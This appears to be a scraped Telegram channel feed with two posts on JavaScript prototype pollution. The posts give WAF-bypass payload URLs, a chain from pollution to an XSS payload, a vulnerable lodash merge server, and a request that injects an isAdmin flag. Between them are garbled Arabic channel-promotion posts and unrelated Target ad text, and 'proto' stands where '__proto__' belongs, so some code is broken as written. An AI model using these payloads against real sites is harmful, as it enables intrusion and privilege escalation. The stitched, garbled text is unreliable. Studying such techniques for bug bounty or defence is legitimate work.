var name = "Arya";
console.log(name.proto);
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
a.proto;ploiting Prototype Pollution
Ex
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
โโโโโโโโโโโโโโโโโโ
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1๏ธโฃ Dot Notation Approach
http://target.com/?proto.arya=arya
2๏ธโฃ Bracket Notation Approach
http://target.com/?proto[arya]=arya
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya
If the WAF still blocks requests, we can use nested obfuscation techniques:
/?proprototo[arya]=arya
/?proprototo.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
let test = {};
console.log(test.arya); // Output: " arya"
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
โโโโโโโโโโโโโโโโโโ
Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
โค7๐6๐ฅ4
ุฃููุงู ูุณููุงู ุจูู
ุฌู
ูุนุงูุ
ูุฐู ู ุฌู ูุนุฉ ู ู ุงููููุงุช ุงูุฎุงุตุฉ ุจูุง ูุงูุชู ูุฏ ุชููุฏูู ุฎูุงู ุฑุญูุชูู ูู ุงูู ุฌุงู ุงูุชููู ูุฎุงุตุฉู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู.
@end_k
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@darkcsc
ูุฐู ู ุฌู ูุนุฉ ู ู ุงููููุงุช ุงูุฎุงุตุฉ ุจูุง ูุงูุชู ูุฏ ุชููุฏูู ุฎูุงู ุฑุญูุชูู ูู ุงูู ุฌุงู ุงูุชููู ูุฎุงุตุฉู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู.
@end_k
ููุงุชูุง ุงูู ุดุชุฑูุฉ ูุงูุชู ุชุญุชูู ุนูู ุจุซูุซ ู ุจุงุดุฑุฉ ูู ุญุชูู ู ู ูุฒ ูุบูุฑ ู ุณุจูู.@iiLinux
ููุงุฉ ุนุงู ุฉ ุชููู ุจูุดุฑ ุงูุชูููุงุช ุงูุนุงู ุฉ ู ุชุชู ูุฒ ุจุดุฑูุญุงุช ููููุณ.
@GlobalRedHat
ุงูู ุฌุชู ุน ุงูุฑุณู ู ูููุฑุงุตูุฉ ุฐูู ุงููุจุนุฉ ุงูุญู ุฑุงุก.
@k7ali_linux
ููุงุฉ ุชุฎุต ุดุฑูุญุงุช ูุงูู ููููุณ ุจุดูู ู ุฎุชูู ูู ุชู ูุฒ.
@ExploitQuest
ููุงุฉ ุชูุชู ุจุงูุชุดุงู ุงูุซุบุฑุงุช ู ุงุณุชุบูุงููุง ุจุงูุฅุถุงูุฉ ุฅูู ุงูุดุฑูุญุงุช ุงูู ู ูุฒุฉ ูููุง.@EgyptianshieldTOOLS
ููุงุฉ ุฎุงุตุฉ ุจุงูุฃุฏูุงุช ุงูู ุณุชุฎุฏู ุฉ ูู ุงูุจุฑู ุฌุฉ ูุงูุฃู ู ุงูุณูุจุฑุงูู.
@iiMrDark
ููุงุฉ ุชูุฏู ู ุญุชูู ุฎุงุต ุจุงูุชุณุฑูุจุงุช ูุงูุจุฑุงู ุฌ.
@Wa3i_Tech
ููุงุฉ ุชูุฏู ุงููุนู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู ูุดุฑูุญุงุช ู ุจุณุทุฉ.
@codearabs
ููุงุฉ ู ุฎุชุตุฉ ุจุชุณุฑูุจ ููุฑุณุงุช ุงูุดุฑูุงุช ุงูู ุดููุฑุฉ ูู ุงูู ุฌุงูุงุช ุงูุชูููุฉ.@Egyshield
ููุงุฉ ู ุฎุชุตุฉ ุจุงูุดุฑูุญุงุช ูุงูุฃุฎุจุงุฑ ุงูุชูููุฉ ูุชุญุฏูุฏุงู ูู ุงูุจุฑู ุฌุฉ ูุงูุฃู ู ุงูุณูุจุฑุงูู.@Bad_Rabbit_Team
ููุงุฉ Bad Rabbit โ ููุงุฉ ู ุชุฎุตุตุฉ ูู ุงููุฌู ุงุช ุงูุณูุจุฑุงููุฉุ ุชูุฏู ุดุฑูุญุงุช ุนู ููุฉ ุนู ุงุฎุชุจุงุฑ ุงูุงุฎุชุฑุงูุ ุชุญููู ุงูุซุบุฑุงุชุ ูุฃุฏูุงุช ุงููุฌูู ุงูุฅููุชุฑููู.@GlobalRedTeam
ุงูู ุฌุชู ุน ุงูุฑุณู ู ููGlobal Red Team
@darkcsc
ููุงุฉ ุฎุงุตุฉ ุจุนูู ุงูุญุงุณูุจ ูุชุญุชูู ุนูู ุดุฑูุญุงุช ุชุฎุต ุงูุญุงุณูุจ ุจุดูู ุนุงู .
๐4โค2
ExploitQuest
Prototype Pollution Vulnerability Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object propertiesโฆ
A Real-World Example of Prototype Pollution Exploitation
A hacker was testing a target and noticed that it didnโt properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype via the URL.
To test for Prototype Pollution, they started with the following request:
https://target.com/?proto.arya=arya
However, the WAF (Web Application Firewall) blocked this attempt.
To bypass it, they got creative and modified the payload:
https://target.com/?proprototo.arya=arya
To confirm if the vulnerability was present, they opened the browser console and created an empty object:
test = {};
test.arya; // Outputs: "arya"Since the property (arya) was successfully injected into the object, Prototype Pollution was confirmed!
But Prototype Pollution alone has no significant impact, so they needed to chain it with another vulnerabilityโlike XSSโto escalate the attack.
โโโโโโโโโโโโโโโโโโ
Leveraging Web Archives for Further Exploitation
While analyzing the targetโs Web Archive, the hacker noticed many URLs contained # followed by useful information.
Reminder:
Everything after # in a URL is not sent to the server but is processed directly by the DOM, meaning the WAF wonโt block it!
The hacker decided to test this method:
https://target.com/#proto.arya=arya
By following the same console-based verification, they confirmed the attack worked.
โโโโโโโโโโโโโโโโโโ
Turning Prototype Pollution into
XSS
Through behavior analysis, they discovered that injected values were being inserted into the style attribute of HTML elements.
Now, they could escalate this attack by chaining Prototype Pollution with XSS:
https://target.com/#proto[onload]=alert(1)
โโโโโโโโโโโโโโโโโโ
Prototype Pollution - Server Side
Prototype Pollution isnโt just a client-side issueโit can also be exploited on the server side.
If a Node.js server uses libraries that improperly merge user input into objects (e.g., lodash, merge, deepExtend, setValue), it becomes vulnerable!
Example of a Vulnerable Node.js Code
const _ = require('lodash');
const express = require('express');
const app = express();
app.use(express.json());
app.post('/update', (req, res) => {
let defaultConfig = { role: 'user' };
let userConfig = req.body;
let finalConfig = _.merge({}, defaultConfig, userConfig);
res.json(finalConfig);
});
app.listen(3000, () => console.log("Server running on port 3000")); Whereโs the Problem?
The function _.merge() merges user input with the defaultConfig object.
If an attacker sends a payload with proto, they can modify the prototype of all objects in the application!
โโโโโโโโโโโโโโโโโโ
Attack Scenario (Exploiting the
Above Code)
The hacker discovers an API endpoint /update that sets user roles.
They send the following malicious request:
POST /update HTTP/1.1
Host: target.com
Content-Type: application/json
{
"proto": { "isAdmin":
true }
}
What Happens?
Since proto affects Object.prototype, every new object created in the application will automatically have isAdmin = true!
Conclusion
Prototype Pollution is a serious vulnerability that can be exploited both client-side and server-side.
When combined with other vulnerabilities (like XSS, RCE, or privilege escalation), it can have a critical impact.
Developers should use secure coding practices and avoid unsafe object merging in applications.
[https://t.me/ExploitQuest]
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
โค7๐6๐ฅ4๐คฏ1
Forwarded from s4rrar
ุฃููุงู ูุณููุงู ุจูู
ุฌู
ูุนุงูุ
ูุฐู ู ุฌู ูุนุฉ ู ู ุงููููุงุช ุงูุฎุงุตุฉ ุจูุง ูุงูุชู ูุฏ ุชููุฏูู ุฎูุงู ุฑุญูุชูู ูู ุงูู ุฌุงู ุงูุชููู ูุฎุงุตุฉู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู.
@end_k
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@darkcsc
ูุฐู ู ุฌู ูุนุฉ ู ู ุงููููุงุช ุงูุฎุงุตุฉ ุจูุง ูุงูุชู ูุฏ ุชููุฏูู ุฎูุงู ุฑุญูุชูู ูู ุงูู ุฌุงู ุงูุชููู ูุฎุงุตุฉู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู.
@end_k
ููุงุชูุง ุงูู ุดุชุฑูุฉ ูุงูุชู ุชุญุชูู ุนูู ุจุซูุซ ู ุจุงุดุฑุฉ ูู ุญุชูู ู ู ูุฒ ูุบูุฑ ู ุณุจูู.@iiLinux
ููุงุฉ ุนุงู ุฉ ุชููู ุจูุดุฑ ุงูุชูููุงุช ุงูุนุงู ุฉ ู ุชุชู ูุฒ ุจุดุฑูุญุงุช ููููุณ.
@GlobalRedHat
ุงูู ุฌุชู ุน ุงูุฑุณู ู ูููุฑุงุตูุฉ ุฐูู ุงููุจุนุฉ ุงูุญู ุฑุงุก.
@k7ali_linux
ููุงุฉ ุชุฎุต ุดุฑูุญุงุช ูุงูู ููููุณ ุจุดูู ู ุฎุชูู ูู ุชู ูุฒ.
@ExploitQuest
ููุงุฉ ุชูุชู ุจุงูุชุดุงู ุงูุซุบุฑุงุช ู ุงุณุชุบูุงููุง ุจุงูุฅุถุงูุฉ ุฅูู ุงูุดุฑูุญุงุช ุงูู ู ูุฒุฉ ูููุง.@EgyptianshieldTOOLS
ููุงุฉ ุฎุงุตุฉ ุจุงูุฃุฏูุงุช ุงูู ุณุชุฎุฏู ุฉ ูู ุงูุจุฑู ุฌุฉ ูุงูุฃู ู ุงูุณูุจุฑุงูู.
@iiMrDark
ููุงุฉ ุชูุฏู ู ุญุชูู ุฎุงุต ุจุงูุชุณุฑูุจุงุช ูุงูุจุฑุงู ุฌ.
@Wa3i_Tech
ููุงุฉ ุชูุฏู ุงููุนู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู ูุดุฑูุญุงุช ู ุจุณุทุฉ.
@codearabs
ููุงุฉ ู ุฎุชุตุฉ ุจุชุณุฑูุจ ููุฑุณุงุช ุงูุดุฑูุงุช ุงูู ุดููุฑุฉ ูู ุงูู ุฌุงูุงุช ุงูุชูููุฉ.@Egyshield
ููุงุฉ ู ุฎุชุตุฉ ุจุงูุดุฑูุญุงุช ูุงูุฃุฎุจุงุฑ ุงูุชูููุฉ ูุชุญุฏูุฏุงู ูู ุงูุจุฑู ุฌุฉ ูุงูุฃู ู ุงูุณูุจุฑุงูู.@Bad_Rabbit_Team
ููุงุฉ Bad Rabbit โ ููุงุฉ ู ุชุฎุตุตุฉ ูู ุงููุฌู ุงุช ุงูุณูุจุฑุงููุฉุ ุชูุฏู ุดุฑูุญุงุช ุนู ููุฉ ุนู ุงุฎุชุจุงุฑ ุงูุงุฎุชุฑุงูุ ุชุญููู ุงูุซุบุฑุงุชุ ูุฃุฏูุงุช ุงููุฌูู ุงูุฅููุชุฑููู.@GlobalRedTeam
ุงูู ุฌุชู ุน ุงูุฑุณู ู ููGlobal Red Team
@darkcsc
ููุงุฉ ุฎุงุตุฉ ุจุนูู ุงูุญุงุณูุจ ูุชุญุชูู ุนูู ุดุฑูุญุงุช ุชุฎุต ุงูุญุงุณูุจ ุจุดูู ุนุงู .
๐6๐1